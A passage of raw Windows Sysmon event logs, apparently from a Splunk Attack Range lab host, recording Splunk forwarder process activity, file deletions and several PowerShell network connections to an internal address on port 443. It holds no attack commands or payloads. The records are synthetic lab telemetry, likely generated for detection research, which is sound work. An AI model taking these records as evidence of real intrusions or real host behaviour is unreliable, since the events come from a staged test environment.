Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.844{B81B27B7-4CBB-613A-0C90-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCC62BB7016309E631D9A8C1ECE106AC,SHA256=5E0A8A4FEDCB4DABE717F18A984D3B08DC74AA0BCB6812D3431FE1F28C6186B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=400ADB5DDB80DF69DAC0E0776FAB82DC,SHA256=094D218D1860DEE91847E36969C1778569AAB134B63A51978CC5563B847B7AFB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.893{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95A9DB9E63211794FF7273B8B834890A,SHA256=348694B5FBE218062F6F1EDA30DE85E1BB012EDEA3D2EA6BF71868605E54F4FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.696{B81B27B7-4CBC-613A-0D90-03000000C801}47166956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035083334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.612{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA4AD335279D54C505F9F957CC8B39BB,SHA256=3474A0C5A03E6AE12ADFAD9B6FB6F4C150A64EC9ED2548DACEF58808D1F69B35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.543{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CBC-613A-0D90-03000000C801}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.543{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.543{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.543{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.543{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.543{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4CBC-613A-0D90-03000000C801}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.543{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CBC-613A-0D90-03000000C801}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.528{B81B27B7-4CBC-613A-0D90-03000000C801}4716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035083325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:09.024{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56462-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035083324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.043{B81B27B7-4CBB-613A-0C90-03000000C801}7004908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035083323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:44.043{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5EB6957777E31DCD2FDA9067A5E4F2F9,SHA256=B84ED568312EC68036983431FC7BC7D3843E04486B8BEAA14D3EC3207377BF2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A58CBCBD041FB6B0C081395F9306686B,SHA256=9D6455C26BBE2258B8695223878C2C46C81ADBD1F2A80FAAF5E6251DDFE37F52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CBD-613A-0E90-03000000C801}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CBD-613A-0E90-03000000C801}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.159{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CBD-613A-0E90-03000000C801}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:45.144{B81B27B7-4CBD-613A-0E90-03000000C801}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:46.658{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=037039EAF28C58B8FF44177AFFC4B7FB,SHA256=C369F9111CB3AC8B19CE5C2C7F288BA435C3249FFC28558F050FB6C6CDCB4DAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:10.154{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56463-false10.0.1.12-8000- 23542300x800000000000000035083347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:46.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=400ADB5DDB80DF69DAC0E0776FAB82DC,SHA256=094D218D1860DEE91847E36969C1778569AAB134B63A51978CC5563B847B7AFB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:47.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1783A24992D58495B91BA1996F755D98,SHA256=3D2E07F69535A89CEA5DEA91B2974339209143F4E08B6E459CD31A4F1A82B8EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:48.709{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE65CDF63C267A01D8D0E71FD7C71864,SHA256=99D3BD84DF503F0E2CFBD8C99D659A1ED32AA68E129A1152068E362EB7AC6B8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:49.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A78E73179D9282B2ABA85813D14A524,SHA256=3351EFED1F87ED9EC16047C4B94B41B510B22975A49C680812DD0009121B845A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:49.039{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C80CE1E0E95AC2B6F55BDBDDCE8173BD,SHA256=15B6272914BC95E418C35D1CACDB92522FC2C5DE6372C0211366BF8649CD9FF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:50.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAF3D01DB58138730BDF20364BF5ECC3,SHA256=51F484FC4316587FE29075B3EC85667925262B7F9253F6C98234839260BE8FA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:14.036{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56464-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:51.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 